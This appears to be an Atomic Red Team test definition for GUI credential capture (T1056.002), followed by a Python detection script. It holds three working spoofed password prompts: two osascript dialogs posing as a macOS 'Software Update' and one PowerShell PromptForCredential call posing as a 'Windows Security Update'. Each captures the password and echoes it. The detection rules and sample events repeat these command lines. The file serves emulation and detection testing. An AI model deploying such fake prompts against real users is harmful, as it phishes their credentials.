atomic-red-team/atomics/T1056.002/T1056.002.yaml
2023-10-07 19:07:01 +00:00

attack_technique: T1056.002
display_name: 'Input Capture: GUI Input Capture'
atomic_tests:
- name: AppleScript - Prompt User for Password
  auto_generated_guid: 76628574-0bc1-4646-8fe2-8f4427b47d15
  description: |
    Prompt User for Password (Local Phishing)
    Reference: http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.html
  supported_platforms:
  - macos
  executor:
    command: |
      osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to display dialog "Software Update requires that you type your password to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"'
    name: bash
- name: PowerShell - Prompt User for Password
  auto_generated_guid: 2b162bfd-0928-4d4c-9ec3-4d9f88374b52
  description: |
    Prompt User for Password (Local Phishing) as seen in Stitch RAT. Upon execution, a window will appear for the user to enter their credentials.
    Reference: https://github.com/nathanlopez/Stitch/blob/master/PyLib/askpass.py
  supported_platforms:
  - windows
  executor:
    command: |
      # Creates GUI to prompt for password. Expect long pause before prompt is available.
      $cred = $host.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName)
      # Using write-warning to allow message to show on console as echo and other similar commands are not visible from the Invoke-AtomicTest framework.
      write-warning $cred.GetNetworkCredential().Password
    name: powershell
- name: AppleScript - Spoofing a credential prompt using osascript
  auto_generated_guid: b7037b89-947a-427a-ba29-e7e9f09bc045
  description: |
    Prompt user for password without requiring permissions to send Apple events to System Settings.
    https://embracethered.com/blog/posts/2021/spoofing-credential-dialogs/
  supported_platforms:
  - macos
  executor:
    command: |
      PWD_SPOOF=$(osascript -e 'display dialog "To perform a security update MacOS needs your passphrase." with title "MacOS Security Update" default answer "" with icon stop with hidden answer')
      echo $PWD_SPOOF
    name: bash
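The three tests above share two observable traits a detection engineer can key on: on macOS, `osascript` building a `display dialog` whose input is masked with `with hidden answer`; on Windows, PowerShell raising a credential dialog through `$host.UI.PromptForCredential`. The following is an added example, not part of the Atomic Red Team file, that scans process-creation events for those traits. The event schema (`host`, `image`, `command_line`) and the sample events are constructed here for illustration; the command lines are modelled on the YAML above, with two benign events included to show what the rules do not fire on.

```python
"""Flag process-creation events whose command line resembles the GUI
credential-prompt patterns described in T1056.002 (added example)."""
import re
from dataclasses import dataclass
from typing import Iterable, Optional


@dataclass(frozen=True)
class Rule:
    name: str
    process: re.Pattern       # matched against the executable path/name
    indicators: tuple         # every pattern must be present in the command line


RULES = (
    # macOS: osascript building a dialog that masks the typed text ("hidden answer")
    Rule("osascript_hidden_answer_dialog",
         re.compile(r"(^|/)osascript$", re.I),
         (re.compile(r"display\s+dialog", re.I),
          re.compile(r"hidden\s+answer", re.I))),
    # Windows: PowerShell raising a credential dialog via the host UI
    Rule("powershell_promptforcredential",
         re.compile(r"(^|\\)(powershell|pwsh)(\.exe)?$", re.I),
         (re.compile(r"PromptForCredential", re.I),)),
)


@dataclass(frozen=True)
class Finding:
    host: str
    rule: str
    command_line: str


def match_event(event: dict) -> Optional[Finding]:
    """Return a Finding when the event's image and command line satisfy a rule."""
    image = event.get("image", "")
    cmdline = event.get("command_line", "")
    for rule in RULES:
        if rule.process.search(image) and all(p.search(cmdline) for p in rule.indicators):
            return Finding(event.get("host", "?"), rule.name, cmdline)
    return None


def scan(events: Iterable[dict]) -> list:
    """Run every event through the rules and collect the findings, in input order."""
    return [f for f in (match_event(e) for e in events) if f is not None]


# Constructed sample events (hypothetical hosts); command lines modelled on the YAML above.
SAMPLE_EVENTS = [
    {"host": "mac-01", "image": "/usr/bin/osascript",
     "command_line": "osascript -e 'tell app \"System Preferences\" to display dialog "
                     "\"Software Update requires that you type your password to apply changes.\" "
                     "default answer \"\" with icon 1 with hidden answer with title \"Software Update\"'"},
    {"host": "mac-01", "image": "/usr/bin/osascript",   # benign: a notification, no masked input
     "command_line": "osascript -e 'display notification \"Backup finished\" with title \"Time Machine\"'"},
    {"host": "mac-02", "image": "/usr/bin/osascript",
     "command_line": "osascript -e 'display dialog \"To perform a security update MacOS needs your passphrase.\" "
                     "with title \"MacOS Security Update\" default answer \"\" with icon stop with hidden answer'"},
    {"host": "win-01", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -c \"$cred = $host.UI.PromptForCredential('Windows Security Update', '', "
                     "[Environment]::UserName, [Environment]::UserDomainName)\""},
    {"host": "win-01", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",   # benign
     "command_line": "powershell.exe -c \"Get-Date\""},
]


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.host}: {f.rule}: {f.command_line[:70]}...")
```

Both rules require the executable name and the command-line indicators together, so a script that merely mentions `display dialog` in a help string, or an interactive shell that calls `PromptForCredential` by hand, still needs the matching process image before it is reported; tune the indicator lists against your own telemetry before treating hits as anything more than triage leads.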